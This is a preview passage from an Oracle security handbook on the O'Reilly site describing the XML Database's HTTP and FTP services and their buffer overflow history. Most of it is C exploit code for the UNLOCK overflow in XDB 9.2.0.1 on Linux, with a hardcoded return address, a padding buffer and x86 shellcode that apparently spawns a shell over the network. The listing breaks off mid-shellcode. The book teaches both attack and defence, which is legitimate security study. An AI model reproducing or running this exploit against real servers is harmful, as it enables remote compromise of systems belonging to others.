3.3. The XML Database

The XML database, otherwise known as XDB, offers two services — one over HTTP on TCP port 8080 and an FTP-based service on TCP port 2100. In the past XDB has suffered from numerous buffer overflow vulnerabilities, including an overflow in the authentication mechanism with an overly long username or password. The following code exploits the UNLOCK overflow on XDB 9.2.0.1 that is running on Linux:

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
int main(int argc, char *argv[])
{
      struct hostent *he;
      struct sockaddr_in sa;
      int sock;
      unsigned int addr = 0;
      char recvbuffer[512]="";
char user[260]="user "; char passwd[260]="pass "; int rcv=0; int snd =0; int count = 0; unsigned char nop_sled[1804]=""; unsigned char saved_return_address[]="\x41\xc8\xff\xbf"; unsigned char exploit[2100]="unlock / AAAABBB" "BCCCCDDDDEEEEFFF" "FGGGGHHHHIIIIJJJ" "JKKKKLLLLMMMMNNN" "NOOOOPPPPQQQQRRR" "RSSSSTTTTUUUUVVV" "VWWWWXXXXYYYYZZZ" "Zaaaabbbbccccdd"; unsigned char code[]="\x31\xdb\x53\x43\x53\x43\x53\x4b\x6a\x66\x58\x54\x59\xcd" "\x80\x50\x4b\x53\x53\x53\x66\x68\x41\x41\x43\x43\x66\x53" "\x54\x59\x6a\x10\x51\x50\x54\x59\x6a\x66\x58\xcd\x80\x58" "\x6a\x05\x50\x54\x59\x6a\x66\x58\x43\x43\xcd\x80\x58\x83" "\xec\x10\x54\x5a\x54\x52\x50\x54\x59\x6a\x66\x58\x43\xcd" "\x80\x50\x31\xc9\x5b\x6a\x3f\x58\xcd\x80\x41\x6a\x3f\x58" "\xcd\x80\x41\x6a\x3f\x58\xcd\x80\x6a\x0b\x58\x99\x52\x68" "\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x54\x5b\x52\x53\x54" ...

Get The Oracle® Hacker's Handbook: Hacking and Defending Oracle now with O’Reilly online learning.

O’Reilly members experience live online training, plus books, videos, and digital content from 200+ publishers.